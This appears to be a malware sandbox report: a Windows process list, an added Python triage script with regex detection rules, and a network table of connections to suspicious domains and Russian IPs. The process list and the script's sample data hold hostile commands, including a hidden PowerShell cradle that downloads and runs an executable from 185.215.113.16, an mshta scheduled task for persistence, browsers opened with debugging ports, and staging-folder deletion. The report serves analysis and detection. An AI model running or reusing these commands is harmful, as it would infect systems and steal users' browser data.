C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4432,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE
"C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4736,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4944 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1728 -s 1712
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "nLlCHmaz9jk" /tr "mshta \"C:\Temp\f71Q9b6DZ.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\f71Q9b6DZ.hta"
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9988446f8,0x7ff998844708,0x7ff998844718
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3008 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe
"C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe
"C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\2n790" & exit
C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe
"C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe
"C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe"
C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe
"C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5956 -ip 5956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 808
C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe
"C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe"
C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe
"C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe"
C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe
"C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe"
C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe
"C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9af06cc40,0x7ff9af06cc4c,0x7ff9af06cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2056,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2052 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2100 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2504 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3828,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4584,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe
"C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4864 /prefetch:8
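The command lines in the process list above carry the behaviours the summary flags: a scheduled task that relaunches an .hta through mshta every 25 minutes, a hidden PowerShell WebClient cradle that fetches random.exe from 185.215.113.16 and starts it, Chrome and Edge launched with --remote-debugging-port=9223, a delayed rd /s /q of a staging directory, and taskkill of firefox.exe. The Python below is an added example, not part of the report or of any listed family's code: it runs a small set of regex rules over command lines copied from this list and pulls the payload URL and drop name out of each cradle. The rule names, technique mappings and the lands_outside_temp flag are the example's own. That flag records something visible in the list itself: the first cradle joins $env:temp and the file name with no backslash, which is why the payload later appears at C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE, beside the Temp folder rather than inside it.

```python
"""Command-line triage for the process list above: each rule names a behaviour
a defender would alert on and the ATT&CK technique it maps to (added example)."""
import re

# Constructed sample input: command lines copied verbatim from the process list.
SAMPLE_CMDLINES = [
    r'''C:\Windows\system32\cmd.exe /c schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f''',
    r'''schtasks /create /tn "nLlCHmaz9jk" /tr "mshta \"C:\Temp\f71Q9b6DZ.hta\"" /sc minute /mo 25 /ru "Admin" /f''',
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;""",
    r'''"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"''',
    r'''"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US''',
    r'''"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"''',
    r'''"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\2n790" & exit''',
    r'''taskkill /F /IM firefox.exe /T''',
    r'''powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"''',
    r'''C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 796''',
]

# (rule name, pattern, why it matters). Names and mappings are this example's own.
RULES = [
    ("schtasks_mshta_hta",
     r'schtasks\s+/create\b.*/tr\s+"?mshta\b.*\.hta',
     "T1053.005 / T1218.005: task re-runs an .hta through mshta on a timer"),
    ("powershell_download_cradle",
     r"WebClient\)\.Download(?:File|String)\(.*(?:Start-Process|Invoke-Expression|\biex\b)",
     "T1059.001 / T1105: PowerShell downloads a PE over plain HTTP and runs it"),
    ("browser_remote_debugging",
     # only the top-level launch; --type= children merely inherit the flag
     r'^(?!.*--type=).*\b(?:chrome|msedge)\.exe"?\s.*--remote-debugging-port=\d+',
     "T1539: browser started with a DevTools port ('Uses browser remote debugging')"),
    ("timeout_then_delete",
     r"timeout\s+/t\s+\d+\s*&.*\b(?:rd|rmdir|del)\s+/s\s+/q",
     "T1070.004: delayed removal of a staging directory"),
    ("taskkill_browser",
     r"taskkill\b.*?/im\s+(?:firefox|chrome|msedge)\.exe",
     "browser killed, typically to release locks on its profile databases before copying them"),
    ("powershell_random_name",
     r"Get-Random\s+-Count\s+\d+.*\[char\]",
     "low: random alphanumeric names for dropped files and tasks"),
]
COMPILED = [(name, re.compile(pat, re.I), why) for name, pat, why in RULES]


def triage(cmdline: str) -> list[str]:
    """Return the names of every rule the command line trips, in RULES order."""
    return [name for name, rx, _ in COMPILED if rx.search(cmdline)]


def triage_all(cmdlines) -> dict[str, list[int]]:
    """Map rule name -> indices of the command lines that matched it."""
    hits: dict[str, list[int]] = {}
    for i, cmd in enumerate(cmdlines):
        for name in triage(cmd):
            hits.setdefault(name, []).append(i)
    return hits


CRADLE_URL = re.compile(r"DownloadFile\('(?P<url>https?://[^']+)'")
CRADLE_DROP = re.compile(r"\$env:temp\+'(?P<name>[^']+)'")


def cradle_details(cmdline: str):
    """Pull the payload URL and drop name out of a WebClient cradle.
    lands_outside_temp is True when the name is appended to $env:temp without a
    leading backslash, so the file is written as ...\Local\Temp<NAME> next to the
    Temp folder (the path the process list shows for the first cradle's payload)."""
    u, d = CRADLE_URL.search(cmdline), CRADLE_DROP.search(cmdline)
    if not (u and d):
        return None
    name = d.group("name")
    return {"url": u.group("url"), "drop": name,
            "lands_outside_temp": not name.startswith("\\")}


if __name__ == "__main__":
    for rule, idxs in triage_all(SAMPLE_CMDLINES).items():
        why = next(w for n, _, w in RULES if n == rule)
        print(f"{rule:28s} lines {idxs}  {why}")
    for cmd in SAMPLE_CMDLINES:
        if (details := cradle_details(cmd)):
            print(details)
```

The rules key on the structure of the command (schtasks + mshta + .hta, WebClient + Start-Process, top-level browser + debug port) rather than on the random task names or file names, which change per run; the renderer and utility children that repeat --remote-debugging-port are deliberately ignored so each browser launch is reported once.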
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 185.215.113.75:80 | 185.215.113.75 | tcp |
| US | 8.8.8.8:53 | advertised.life | udp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | fua.4t.com | udp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:80 | ipinfo.io | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | e6.o.lencr.org | udp |
| GB | 2.23.210.75:80 | e6.o.lencr.org | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 142.250.187.202:443 | ogads-pa.googleapis.com | udp |
| GB | 142.250.187.202:443 | ogads-pa.googleapis.com | tcp |
| DE | 109.120.178.136:80 | 109.120.178.136 | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 185.198.234.185:80 | cobolrationumelawrtewarms.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| N/A | 127.0.0.1:9223 | N/A | tcp |
| N/A | 127.0.0.1:9223 | N/A | tcp |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 104.21.42.12:443 | pirtyoffensiz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| N/A | 127.0.0.1:9223 | N/A | tcp |
| N/A | 127.0.0.1:9223 | N/A | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| DE | 94.130.190.206:443 | fua.4t.com | tcp |
| US | 8.8.8.8:53 | investiigato.website | udp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 8.8.8.8:53 | breakfasutwy.cyou | udp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | importenptoc.com | udp |
| US | 8.8.8.8:53 | voicesharped.com | udp |
| US | 8.8.8.8:53 | inputrreparnt.com | udp |
| US | 8.8.8.8:53 | torpdidebar.com | udp |
| US | 8.8.8.8:53 | rebeldettern.com | udp |
| US | 8.8.8.8:53 | actiothreaz.com | udp |
| US | 8.8.8.8:53 | garulouscuto.com | udp |
| US | 8.8.8.8:53 | breedertremnd.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | outlinedtrai.bet | udp |
| US | 104.21.38.27:443 | outlinedtrai.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.42.12:443 | pirtyoffensiz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:80 | ipinfo.io | tcp |
| US | 104.21.64.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | edcatiofireeu.shop | udp |
| US | 8.8.8.8:53 | impolitewearr.biz | udp |
| US | 8.8.8.8:53 | toppyneedus.biz | udp |
| US | 8.8.8.8:53 | lightdeerysua.biz | udp |
| US | 8.8.8.8:53 | suggestyuoz.biz | udp |
| US | 8.8.8.8:53 | hoursuhouy.biz | udp |
| US | 8.8.8.8:53 | mixedrecipew.biz | udp |
| US | 8.8.8.8:53 | affordtempyo.biz | udp |
